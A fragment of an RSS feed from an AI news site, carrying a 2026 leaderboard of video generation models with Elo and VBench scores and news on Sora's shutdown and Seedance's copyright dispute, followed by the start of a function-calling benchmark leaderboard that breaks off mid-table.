]]></content:encoded><dc:creator>Sophie Zhang</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/physical-intelligence-pi07-generalist-robot_hu_afea1e0df0f740d4.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/physical-intelligence-pi07-generalist-robot_hu_afea1e0df0f740d4.jpg" width="1200" height="675"/></item><item><title>Video Generation Benchmarks Leaderboard 2026</title><link>https://awesomeagents.ai/leaderboards/video-generation-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 14:08:41 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/video-generation-benchmarks-leaderboard/</guid><description>&lt;p>The video generation space has had a chaotic few months. OpenAI discontinued Sora on March 24, 2026, less than six months after its public launch, after download numbers had dropped roughly 66% from peak and the product was reportedly burning through $15 million per day in inference costs. ByteDance paused the global rollout of Seedance 2.0 in mid-March following cease-and-desist letters from Disney, Paramount, Warner Bros., and the Motion Picture Association. And a model called HappyHorse-1.0 appeared on Artificial Analysis in early April, topped every ranking within days, then disappeared from public access - before Alibaba confirmed it was their work.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The video generation space has had a chaotic few months. OpenAI discontinued Sora on March 24, 2026, less than six months after its public launch, after download numbers had dropped roughly 66% from peak and the product was reportedly burning through $15 million per day in inference costs. ByteDance paused the global rollout of Seedance 2.0 in mid-March following cease-and-desist letters from Disney, Paramount, Warner Bros., and the Motion Picture Association. And a model called HappyHorse-1.0 appeared on Artificial Analysis in early April, topped every ranking within days, then disappeared from public access - before Alibaba confirmed it was their work.</p>
<p>This leaderboard covers where the major models actually stand, based on two types of evidence: the Artificial Analysis Video Arena (blind Elo from user preference votes) and the VBench/VBench-2.0 academic benchmarks (automated metrics across 16-18 dimensions). The two systems measure different things and sometimes disagree. Both matter.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>HappyHorse-1.0 (Alibaba) leads both T2V and I2V Elo rankings by a wide margin - Elo 1,361 for text-to-video, 1,398 for image-to-video - but its public access status is unclear as of publication</li>
<li>Sora is dead. OpenAI shut down the product March 24; the API stays live until September 24, 2026</li>
<li>Seedance 2.0 sits at Elo 1,268 (T2V) despite its suspended global launch - accessible in China, patchy elsewhere</li>
<li>Best reliably available proprietary pick: Kling 3.0 at Elo 1,247 (T2V) with native 4K and multi-shot consistency</li>
<li>Open-source leader: Wan 2.2, which posted a 84.7% overall VBench score</li>
</ul>
</div>
<h2 id="how-these-benchmarks-work">How These Benchmarks Work</h2>
<h3 id="artificial-analysis-video-arena">Artificial Analysis Video Arena</h3>
<p>Artificial Analysis runs blind pairwise comparisons. A user sees two videos generated from the same prompt, doesn't know which model produced which, and picks a winner. Elo scores update continuously from these votes, the same mechanism used in chess ratings. A gap of 20-30 Elo points translates to roughly 53% win rate in direct head-to-head comparisons.</p>
<p>The leaderboard separates text-to-video and image-to-video tasks, and also splits by whether audio output is included. This matters: models that produce synchronized audio (native sound, not post-dubbed) tend to score higher on the audio leaderboard regardless of visual quality alone.</p>
<p>As of April 2026, the leaderboard covers more than 80 models across 24 API providers.</p>
<h3 id="vbench-and-vbench-20">VBench and VBench-2.0</h3>
<p>VBench, introduced at CVPR 2024 by the Vchitect group, decomposes video generation quality into 16 automated dimensions covering two categories - video quality (subject consistency, motion smoothness, temporal flickering, dynamic degree, aesthetic quality, imaging quality) and video-text alignment (object class, multiple objects, human action, color, spatial relationship, scene, temporal style, appearance style, overall consistency). Each dimension uses a purpose-built automated evaluator rather than a single aggregate score.</p>
<p>VBench-2.0, released in March 2026, extends the framework to test &quot;intrinsic faithfulness&quot; - five new categories (Human Fidelity, Controllability, Creativity, Physics, Commonsense) with 18 fine-grained sub-dimensions. The original VBench caught many technical defects well; VBench-2.0 is designed for models that have already cleared those. Even leading models currently score around 50% on action faithfulness in the new framework, suggesting plenty of headroom remains.</p>
<p>The two benchmarks answer different questions. VBench rewards smooth, coherent video that matches prompts. VBench-2.0 rewards plausible physics, human motion, and real-world causality. A model can score well on one while failing the other.</p>
<p><img src="/images/leaderboards/video-generation-benchmarks-leaderboard-vbench-radar.jpg" alt="VBench closed-source model radar chart showing evaluation across 16 dimensions">
<em>VBench radar chart comparing closed-source video generation models across all 16 evaluation dimensions. Subject consistency and motion smoothness tend to separate top models from the middle tier.</em>
<small>Source: github.com/Vchitect/VBench</small></p>
<hr>
<h2 id="text-to-video-rankings---artificial-analysis-elo">Text-to-Video Rankings - Artificial Analysis Elo</h2>
<p>Rankings as of April 17, 2026. &quot;No Audio&quot; tracks pure visual quality; &quot;With Audio&quot; includes native synchronized audio output as a preference signal.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Elo (No Audio)</th>
          <th>Elo (With Audio)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>HappyHorse-1.0</td>
          <td>Alibaba-ATH</td>
          <td>1,361</td>
          <td>1,225</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Dreamina Seedance 2.0 720p</td>
          <td>ByteDance Seed</td>
          <td>1,268</td>
          <td>1,221</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Kling 3.0 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,247</td>
          <td>1,100</td>
      </tr>
      <tr>
          <td>4</td>
          <td>SkyReels V4</td>
          <td>Skywork AI</td>
          <td>1,234</td>
          <td>1,135</td>
      </tr>
      <tr>
          <td>5</td>
          <td>grok-imagine-video</td>
          <td>xAI</td>
          <td>1,232</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Kling 3.0 Omni 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,230</td>
          <td>1,101</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Kling 3.0 Omni 720p (Std)</td>
          <td>KlingAI</td>
          <td>1,223</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Vidu Q3 Pro</td>
          <td>Vidu</td>
          <td>1,221</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Veo 3</td>
          <td>Google</td>
          <td>1,217</td>
          <td>-</td>
      </tr>
      <tr>
          <td>10</td>
          <td>PixVerse V5.6</td>
          <td>PixVerse</td>
          <td>1,217</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>Source: <a href="https://artificialanalysis.ai/video/leaderboard/text-to-video">Artificial Analysis Text-to-Video Leaderboard</a></p>
<p><strong>Notes on the table above:</strong> HappyHorse-1.0 leads but its public availability is uncertain - Alibaba confirmed authorship on April 10 but hasn't announced a standard API or subscription product. Seedance 2.0 is accessible primarily in China following its global rollout pause. Runway Gen-4.5 was previously reported with an Elo near 1,247, but doesn't appear in the current top-10 by No Audio Elo today. The leaderboard updates continuously.</p>
<hr>
<h2 id="image-to-video-rankings---artificial-analysis-elo">Image-to-Video Rankings - Artificial Analysis Elo</h2>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Elo (No Audio)</th>
          <th>Elo (With Audio)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>HappyHorse-1.0</td>
          <td>Alibaba-ATH</td>
          <td>1,398</td>
          <td>1,165</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Dreamina Seedance 2.0 720p</td>
          <td>ByteDance Seed</td>
          <td>1,347</td>
          <td>1,176</td>
      </tr>
      <tr>
          <td>3</td>
          <td>grok-imagine-video</td>
          <td>xAI</td>
          <td>1,326</td>
          <td>1,087</td>
      </tr>
      <tr>
          <td>4</td>
          <td>PixVerse V6</td>
          <td>PixVerse</td>
          <td>1,314</td>
          <td>-</td>
      </tr>
      <tr>
          <td>5</td>
          <td>SkyReels V4</td>
          <td>Skywork AI</td>
          <td>1,286</td>
          <td>1,087</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Kling 2.5 Turbo 1080p</td>
          <td>KlingAI</td>
          <td>1,286</td>
          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Vidu Q3 Pro</td>
          <td>Vidu</td>
          <td>1,285</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Kling 3.0 Omni 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,284</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kling 3.0 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,282</td>
          <td>-</td>
      </tr>
      <tr>
          <td>10</td>
          <td>PixVerse V5.6</td>
          <td>PixVerse</td>
          <td>1,280</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>Source: <a href="https://artificialanalysis.ai/video/leaderboard/image-to-video">Artificial Analysis Image-to-Video Leaderboard</a></p>
<p>The image-to-video gap between first and second place is 51 Elo points, which is one of the largest margins in the arena's history. For I2V with audio, Seedance 2.0 leads (1,176) over HappyHorse (1,165) and SkyReels V4 (1,087) - the audio pairing is where Seedance retains an advantage.</p>
<hr>
<h2 id="open-source-vbench-rankings">Open-Source VBench Rankings</h2>
<p>The VBench leaderboard tracks 50+ text-to-video models. These are the notable open-source entries by overall score:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th>Developer</th>
          <th>VBench Total (%)</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Wan 2.2</td>
          <td>Alibaba Cloud</td>
          <td>~84.7</td>
          <td>Current open-source leader; trained on 1.5B videos</td>
      </tr>
      <tr>
          <td>Wan 2.1</td>
          <td>Alibaba Cloud</td>
          <td>~83.1</td>
          <td>Previous version; widely deployed in ComfyUI workflows</td>
      </tr>
      <tr>
          <td>HunyuanVideo 1.5</td>
          <td>Tencent</td>
          <td>-</td>
          <td>96.4% visual quality; 68.5% text alignment on sub-metrics</td>
      </tr>
      <tr>
          <td>LTX-2.3</td>
          <td>Lightricks</td>
          <td>-</td>
          <td>Fastest open-source model; optimized for speed</td>
      </tr>
      <tr>
          <td>Mochi 1</td>
          <td>Genmo AI</td>
          <td>-</td>
          <td>10B parameter; Asymmetric Diffusion Transformer architecture</td>
      </tr>
      <tr>
          <td>Open-Sora 2.0</td>
          <td>Various</td>
          <td>-</td>
          <td>11B params; community benchmark scores near HunyuanVideo</td>
      </tr>
  </tbody>
</table>
<p>The Wan series (from Alibaba's open research team, distinct from the HappyHorse product) leads open-source VBench scoring. Wan 2.2 trained on 1.5 billion videos and 10 billion images, and its 84.7% aggregate VBench score is the highest publicly verified number in that tier.</p>
<p>HunyuanVideo 1.5 from Tencent generates at roughly 75 seconds per clip on a RTX 4090 at 480p. Not fast, but more accessible than most proprietary options for developers who want GPU-local generation. LTX-2.3 from Lightricks is the speed pick - it runs notably faster than HunyuanVideo at comparable quality on many prompt types. James covered it when it launched in the <a href="/models/ltx-2-3/">LTX-2.3 model profile</a>.</p>
<p><img src="/images/leaderboards/video-generation-benchmarks-leaderboard-open-source.jpg" alt="VBench open-source model radar chart showing comparison across 16 evaluation dimensions">
<em>VBench radar chart for open-source video generation models. The Wan series consistently leads in temporal consistency and multiple-object tracking.</em>
<small>Source: github.com/Vchitect/VBench</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="happyhorses-dominance-and-the-access-problem">HappyHorse's Dominance and the Access Problem</h3>
<p>HappyHorse-1.0 is the most technically impressive model on these rankings, and also the least accessible. It appeared without attribution on Artificial Analysis around April 7, climbed to first across both T2V and I2V leaderboards within days, then vanished from the platform before Alibaba confirmed ownership on April 10. The <a href="https://creati.ai/ai-news/2026-04-10/alibaba-reveals-happyhorse-ai-video-model-top-ranked/">Alibaba-HappyHorse announcement</a> acknowledged the product but didn't announce a commercial availability date.</p>
<p>The architecture details leaked via the model's documentation suggest a 40-layer single-stream Self-Attention Transformer without Cross-Attention, running inference in only 8 denoising steps. It's optimized specifically for human-centric video - facial expression, lip sync, body motion - which explains why it scores particularly well on human-heavy preference prompts in the arena. You can read more in the <a href="/news/happyhorse-1-alibaba-video-ai-crown/">news coverage of HappyHorse topping the leaderboard</a>.</p>
<p>The practical question for anyone building a pipeline: right now, HappyHorse isn't something you can reliably call. It is a signal of where Alibaba's video research is, not a product.</p>
<h3 id="soras-exit-and-what-it-means">Sora's Exit and What It Means</h3>
<p>OpenAI shut down the Sora consumer app on March 24, 2026. The API continues until September 24. Download numbers had fallen to roughly 1.1 million by February - a 66% decline from peak - and infrastructure costs were estimated at $15 million per day. The <a href="https://techcrunch.com/2026/03/29/why-openai-really-shut-down-sora/">TechCrunch analysis of the shutdown</a> describes a product that failed commercially while technically competitive. Disney had committed $1 billion to a partnership; that agreement ended when Sora did.</p>
<p>OpenAI has said the research team continues working on &quot;world simulation&quot; for robotics applications. Whether a successor video model appears under a different product structure isn't clear.</p>
<h3 id="seedances-legal-limbo">Seedance's Legal Limbo</h3>
<p>ByteDance's Seedance 2.0 is technically strong - Elo 1,268 for T2V, second only to HappyHorse - but its commercial arc is uncertain. The Motion Picture Association sent a cease-and-desist letter in February 2026 over &quot;unauthorized use of US copyrighted works on a massive scale,&quot; with Disney, Warner Bros., Paramount, Netflix, and Sony joining. SAG-AFTRA cited unauthorized use of member voice and likeness. ByteDance paused the global rollout in March. More context in our <a href="/news/bytedance-seedance-2-hollywood-copyright-war/">Seedance Hollywood copyright coverage</a>.</p>
<p>The model remains accessible in China and through some API providers. For international commercial production use, its legal exposure is a real risk to factor in.</p>
<h3 id="the-t2v-vs-i2v-split">The T2V vs. I2V Split</h3>
<p>Text-to-video and image-to-video are distinct tasks that require different model strengths. T2V demands creative interpretation of prompts and consistent world-building from nothing. I2V demands that the model respect an existing visual starting point - maintain object identity, honor the lighting and composition, produce motion that feels native to the input image.</p>
<p>Kling's performance shows the distinction well. Kling 3.0 ranks 3rd in T2V (Elo 1,247) and 9th in I2V (Elo 1,282 for the same Pro 1080p model). PixVerse V6, which doesn't appear in the T2V top-10, reaches rank 4 in I2V (Elo 1,314). Users building workflows should test both tasks explicitly rather than assuming a single ranking applies to both use cases. Our <a href="/tools/best-ai-video-generators-2026/">best AI video generators guide</a> covers this trade-off in more depth.</p>
<h3 id="vbench-20s-harder-questions">VBench-2.0's Harder Questions</h3>
<p>The original VBench caught consistency, smoothness, and alignment failures that plagued 2024-era models. Most 2026 frontier models clear those thresholds comfortably. VBench-2.0 turns the dial harder by asking whether videos show physically plausible interactions. When a character pours water, does it flow correctly? When two objects collide, does the motion follow conservation laws? When a person walks, do their limbs move in anatomically plausible sequence?</p>
<p>On action faithfulness alone, even leading models score around 50% in the VBench-2.0 paper's initial evaluation. The four models tested in the March 2026 paper - HunyuanVideo, CogVideoX-1.5, Sora 480p, and Kling 1.6 - showed consistent weaknesses in dynamic attribute changes, where most scored between 8% and 29%.</p>
<p>Physics is the next frontier that benchmarks have put numbers to. Expect this to become the primary differentiator in 2027 rankings.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>For professional video production (reliably available):</strong> Kling 3.0 Pro at Elo 1,247 T2V is the strongest option with stable API access and no current legal complications. It supports native 4K output, multi-shot scene logic, and subject consistency across cuts - which matters for anything longer than a 5-second clip. Our <a href="/reviews/review-kling-3/">Kling 3.0 review</a> covers hands-on results.</p>
<p><strong>For social media and short-form at low cost:</strong> Hailuo 02 from MiniMax generates at $0.28 per clip, runs fast, and scores well in user preference testing for casual and social video styles. It won't beat Kling on cinematic quality, but for volume generation the cost difference is significant.</p>
<p><strong>For open-source / local deployment:</strong> Wan 2.2 leads VBench with a 84.7% aggregate score and is Apache 2.0 licensed. LTX-2.3 is the speed pick if latency matters more than absolute quality. HunyuanVideo 1.5 runs on a RTX 4090 at consumer GPU prices and performs well on visual quality sub-metrics even if raw VBench totals aren't publicly confirmed.</p>
<p><strong>For image-to-video specifically:</strong> PixVerse V6 (Elo 1,314) outperforms its T2V ranking markedly and is worth testing separately from any T2V benchmarks you're relying on.</p>
<p><strong>For audio-native video:</strong> Seedance 2.0 leads the With Audio I2V category (Elo 1,176) and is accessible through some API providers despite the global rollout pause. SkyReels V4 at Elo 1,087 is a reliable alternative with audio.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="is-sora-still-available-in-april-2026">Is Sora still available in April 2026?</h3>
<p>The Sora app was shut down March 24, 2026. The Sora API continues until September 24, 2026. No successor product has been announced.</p>
<h3 id="what-is-vbench-20-and-how-is-it-different-from-vbench">What is VBench-2.0 and how is it different from VBench?</h3>
<p>VBench tests 16 dimensions covering video quality and text alignment. VBench-2.0 adds 18 fine-grained dimensions testing intrinsic faithfulness - physics plausibility, human motion realism, commonsense causality, and creative composition. Most current models score below 60% on VBench-2.0 physics tasks.</p>
<h3 id="which-video-model-has-the-best-elo-score-right-now">Which video model has the best Elo score right now?</h3>
<p>HappyHorse-1.0 from Alibaba leads both T2V (Elo 1,361 no-audio) and I2V (Elo 1,398 no-audio) on Artificial Analysis as of April 2026, but public API access isn't yet available.</p>
<h3 id="what-is-the-best-video-model-i-can-actually-use-today">What is the best video model I can actually use today?</h3>
<p>For general availability with strong quality, Kling 3.0 Pro (T2V Elo 1,247) or Veo 3 from Google (Elo 1,217) are solid choices. Open-source developers should look at Wan 2.2 or LTX-2.3.</p>
<h3 id="can-i-use-seedance-20">Can I use Seedance 2.0?</h3>
<p>Seedance 2.0 is accessible in China and through some API providers. ByteDance paused the global consumer rollout in March 2026 due to copyright disputes with major Hollywood studios. Commercial use in international markets carries legal uncertainty.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://artificialanalysis.ai/video/leaderboard/text-to-video">Artificial Analysis Text-to-Video Leaderboard</a></li>
<li><a href="https://artificialanalysis.ai/video/leaderboard/image-to-video">Artificial Analysis Image-to-Video Leaderboard</a></li>
<li><a href="https://vchitect.github.io/VBench-project/">VBench Project Page (Vchitect, CVPR 2024)</a></li>
<li><a href="https://github.com/Vchitect/VBench">VBench GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2503.21755">VBench-2.0 Paper - arXiv 2503.21755</a></li>
<li><a href="https://techcrunch.com/2026/03/29/why-openai-really-shut-down-sora/">Why OpenAI Really Shut Down Sora - TechCrunch, March 29 2026</a></li>
<li><a href="https://edition.cnn.com/2026/03/24/tech/openai-sora-video-app-shutting-down">Sora Shutdown Coverage - CNN Business, March 24 2026</a></li>
<li><a href="https://www.hollywoodreporter.com/business/digital/openai-shutting-down-sora-ai-video-app-1236546187/">Disney Exits OpenAI Deal After Sora Closure - Hollywood Reporter</a></li>
<li><a href="https://www.hollywoodreporter.com/business/business-news/mpa-cease-and-desist-bytedance-seedance-2-0-1236510957/">MPA Cease-and-Desist to ByteDance Over Seedance 2.0 - Hollywood Reporter</a></li>
<li><a href="https://www.aljazeera.com/news/2026/2/16/bytedance-pledges-fixes-to-seedance-2-0-after-hollywood-copyright-claims">ByteDance Pledges Fixes to Seedance 2.0 After Hollywood Claims - Al Jazeera</a></li>
<li><a href="https://creati.ai/ai-news/2026-04-10/alibaba-reveals-happyhorse-ai-video-model-top-ranked/">Alibaba Reveals HappyHorse AI Video Model - Creati.ai, April 10 2026</a></li>
<li><a href="https://runwayml.com/research/introducing-runway-gen-4.5">Runway Gen-4.5 Introduction - Runway Research</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/video-generation-benchmarks-leaderboard_hu_d057a292f6e95341.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/video-generation-benchmarks-leaderboard_hu_d057a292f6e95341.jpg" width="1200" height="675"/></item><item><title>Function Calling Benchmarks Leaderboard 2026</title><link>https://awesomeagents.ai/leaderboards/function-calling-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 14:06:53 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/function-calling-benchmarks-leaderboard/</guid><description>&lt;p>Function calling is one of the capabilities that matters most for anyone building real AI applications - and it's one of the least straightforward to assess. A model that gets 90% on general reasoning can fall apart the moment you ask it to correctly format a nested JSON payload, choose between two semantically similar tools, or recover gracefully when an API returns an error mid-task.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Function calling is one of the capabilities that matters most for anyone building real AI applications - and it's one of the least straightforward to assess. A model that gets 90% on general reasoning can fall apart the moment you ask it to correctly format a nested JSON payload, choose between two semantically similar tools, or recover gracefully when an API returns an error mid-task.</p>
<p>This leaderboard tracks how the major frontier models actually perform on dedicated function calling and tool-use benchmarks. We cover five distinct evaluations: BFCL v3 (single and multi-turn structured calls), tau-bench (multi-turn tool use in realistic customer service scenarios), ToolBench (multi-step real-world API tasks), FinTrace (long-horizon financial tool calling), and MCP-Bench (agentic tool use via Model Context Protocol). Each captures something the others miss.</p>
<p>If you're coming from our <a href="/leaderboards/agentic-ai-benchmarks-leaderboard/">agentic AI benchmarks leaderboard</a>, the coverage here is more focused: we're looking specifically at the tool-calling layer, not the full agent trajectory.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>GLM 4.5 leads BFCL v3 at 76.7%, ahead of Qwen3 32B (75.7%) - Claude Opus 4 scores a surprisingly low 25.3%</li>
<li>Claude Sonnet 4.5 controls tau-bench with 0.700 on airline tasks and 0.862 on retail - the strongest multi-turn tool use score published</li>
<li>GPT-5.2 Thinking hits 98.7% on tau2-bench telecom, though that benchmark's narrow scope inflates the headline number</li>
<li>Budget pick: Qwen3 235B A22B (74.9% BFCL v3) runs open-weight and trades near-frontier scores for zero API costs</li>
</ul>
</div>
<h2 id="the-benchmarks-explained">The Benchmarks Explained</h2>
<p>Before reading the tables, it helps to know what each benchmark actually tests - because the gap between a 76% BFCL score and a 70% tau-bench score isn't just a number difference. They measure different things entirely.</p>
<h3 id="bfcl-v3-berkeley-function-calling-leaderboard">BFCL v3 (Berkeley Function Calling Leaderboard)</h3>
<p>The <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">Berkeley Function Calling Leaderboard</a> from UC Berkeley's Sky Computing Lab is the most widely cited tool-use benchmark. Version 3 added multi-turn interactions on top of the v2 static evaluation. The dataset contains over 2,000 question-function-answer pairs spanning Python, Java, JavaScript, and REST APIs, testing six categories: simple single calls, parallel calls (multiple functions fired simultaneously), multiple function selection, relevance detection (knowing when to refuse a tool call), multi-turn interactions, and multi-step reasoning.</p>
<p>The evaluation method matters here. BFCL uses Abstract Syntax Tree (AST) comparison to check structural correctness of the produced call, not just string matching. That catches paraphrasing games where a model rewrites the function name slightly and a naive eval would still pass it. BFCL v4 has since added web search and memory tasks, but v3 remains the most-assessed version for cross-model comparison. Version 4 scores aren't broadly available yet across 2026 frontier models.</p>
<h3 id="tau-bench-tool-agent-user-interaction">tau-bench (Tool-Agent-User Interaction)</h3>
<p><a href="https://github.com/sierra-research/tau-bench">tau-bench</a> from Sierra Research simulates live customer service scenarios. An AI agent is given a set of API tools and must complete multi-turn conversations with a simulated user - resolving requests like fare changes, return windows, and account modifications while following strict policy guidelines. A Pass@k metric measures how consistently the agent succeeds across k repeated runs. That penalizes brittleness: a model with 80% single-turn accuracy might only complete multi-turn scenarios reliably 50% of the time because errors compound.</p>
<p>There are two primary domains - airline and retail - with a newer telecom variant (tau2-bench) from the same team. Scores across domains aren't directly comparable because task complexity differs, so we report them separately.</p>
<h3 id="toolbench-and-toolllm">ToolBench and ToolLLM</h3>
<p><a href="https://github.com/OpenBMB/ToolBench">ToolBench</a>, published by Tsinghua's NLP lab and accepted at ICLR 2024, tests models against over 120,000 instruction-API pairs drawn from 16,000+ real-world APIs across 49 categories. It stresses tool generalization: models are assessed on unseen tools, unseen instructions, and unseen API categories to test whether they've truly learned to use APIs or just memorized training examples. The ToolLLM paper describes the fine-tuned model trained on ToolBench data; the benchmark itself runs any model through the same evaluation harness.</p>
<h3 id="fintrace">FinTrace</h3>
<p>Published in April 2026, <a href="https://arxiv.org/abs/2604.10015">FinTrace</a> from Carnegie Mellon and a consortium of financial AI researchers targets a specific failure mode: models that pick the right tool but then fail to use the output correctly. The benchmark contains 800 expert-annotated trajectories across 34 financial task categories, scored across nine metrics along four axes - action correctness, execution efficiency, process quality, and output quality. It's the only benchmark in this roundup that explicitly measures whether the model reasons well about tool outputs, not just whether it invokes the right function.</p>
<h3 id="mcp-bench">MCP-Bench</h3>
<p><a href="https://arxiv.org/abs/2508.20453">MCP-Bench</a> from Accenture Labs connects LLMs to 28 live MCP servers spanning 250 tools across domains including finance, scientific computing, and travel. Accepted to NeurIPS 2025, it tests real multi-hop tool coordination: &quot;book a flight to the cheapest city with a conference this month&quot; requires chaining calendar, flight search, and pricing tools in the correct order. This benchmark is newer and has fewer assessed models than BFCL, but it's the closest thing to a production agentic workload in the published benchmark suite.</p>
<hr>
<h2 id="bfcl-v3-rankings">BFCL v3 Rankings</h2>
<p>Data from <a href="https://pricepertoken.com/leaderboards/benchmark/bfcl-v3">pricepertoken.com</a>, accessed April 2026. 23 models assessed; average score 55.9.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BFCL v3 Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>GLM 4.5 Thinking</td>
          <td>Z AI</td>
          <td>76.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 32B Thinking</td>
          <td>Alibaba</td>
          <td>75.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 32B</td>
          <td>Alibaba</td>
          <td>75.7%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3 Max</td>
          <td>Alibaba</td>
          <td>74.9%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-4.7-Flash Thinking</td>
          <td>Z AI</td>
          <td>74.6%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-4.7-Flash</td>
          <td>Z AI</td>
          <td>74.6%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GLM 4.5 Air</td>
          <td>Z AI</td>
          <td>69.1%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Nova Pro 1.0</td>
          <td>Amazon</td>
          <td>67.9%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kimi K2.5 Thinking</td>
          <td>Moonshot AI</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>INTELLECT-3</td>
          <td>Prime Intellect</td>
          <td>63.5%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Llama 4 Scout</td>
          <td>Meta</td>
          <td>55.7%</td>
      </tr>
      <tr>
          <td>13</td>
          <td>Gemini 3 Flash Preview Thinking</td>
          <td>Google</td>
          <td>53.5%</td>
      </tr>
      <tr>
          <td>14</td>
          <td>MiniMax M1</td>
          <td>MiniMax</td>
          <td>47.8%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Nemotron 3 Nano 30B A3B Thinking</td>
          <td>NVIDIA</td>
          <td>41.6%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Nemotron 3 Nano 30B A3B</td>
          <td>NVIDIA</td>
          <td>41.6%</td>
      </tr>
      <tr>
          <td>17</td>
          <td>Phi 4</td>
          <td>Microsoft Azure</td>
          <td>40.8%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Claude Opus 4 Thinking</td>
          <td>Anthropic</td>
          <td>25.3%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>25.3%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Kimi K2 0711</td>
          <td>Moonshot AI</td>
          <td>25.3%</td>
      </tr>
  </tbody>
</table>
<p>The Claude Opus 4 result at 25.3% deserves attention. Anthropic's flagship model, which leads multi-turn agentic benchmarks and beats everyone on tau-bench, scores at the bottom of the BFCL v3 table. That isn't a fluke - it reflects a real tradeoff in how the model handles structured formatting under test conditions. BFCL rewards precise, rigid JSON outputs. Claude tends toward conversational wrapping that can trip up AST parsing even when the underlying tool selection is correct. The discrepancy is a known issue worth understanding before drawing conclusions about real-world usability.</p>
<p><img src="/images/leaderboards/function-calling-benchmarks-leaderboard-code.jpg" alt="Code on screen representing API function calls and tool schemas">
<em>BFCL uses Abstract Syntax Tree comparison to evaluate function call correctness - catching subtle structural errors that string matching misses.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="tau-bench-rankings">tau-bench Rankings</h2>
<h3 id="airline-domain">Airline Domain</h3>
<p>Data from <a href="https://llm-stats.com/benchmarks/tau-bench-airline">llm-stats.com</a>, accessed April 2026. 23 models assessed; average score 0.495.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Airline Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Sonnet 4.5</td>
          <td>Anthropic</td>
          <td>0.700</td>
      </tr>
      <tr>
          <td>2</td>
          <td>MiniMax M1 80K</td>
          <td>MiniMax</td>
          <td>0.620</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GLM-4.5-Air</td>
          <td>Zhipu AI</td>
          <td>0.608</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GLM-4.5</td>
          <td>Zhipu AI</td>
          <td>0.604</td>
      </tr>
      <tr>
          <td>5</td>
          <td>MiniMax M1 40K</td>
          <td>MiniMax</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4</td>
          <td>Anthropic</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>5</td>
